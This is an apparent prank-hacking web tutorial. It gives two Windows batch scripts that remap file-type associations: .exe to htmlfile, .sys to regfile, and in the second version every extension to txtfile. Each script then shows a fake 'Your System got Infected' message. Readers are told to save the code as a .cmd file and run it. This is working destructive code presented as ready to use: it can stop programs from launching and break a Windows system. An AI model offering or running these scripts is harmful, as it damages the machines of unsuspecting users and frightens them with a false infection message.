File Association/Extension Changer

  • Open Notepad and Paste the following code:

    @echo off
    assoc .txt=jpegfile
    assoc .exe=htmlfile
    assoc .jpeg=avifile
    assoc .png=mpegfile
    assoc .mpeg=txtfile
    assoc .sys=regfile
    msg Your System got Infected…..
    exit


    or try this once


    @echo off
    assoc .*=txtfile
    msg Your System got Infected…..
    exit


  • Save it as AnyName.cmd
  • Your Code is Ready



Comments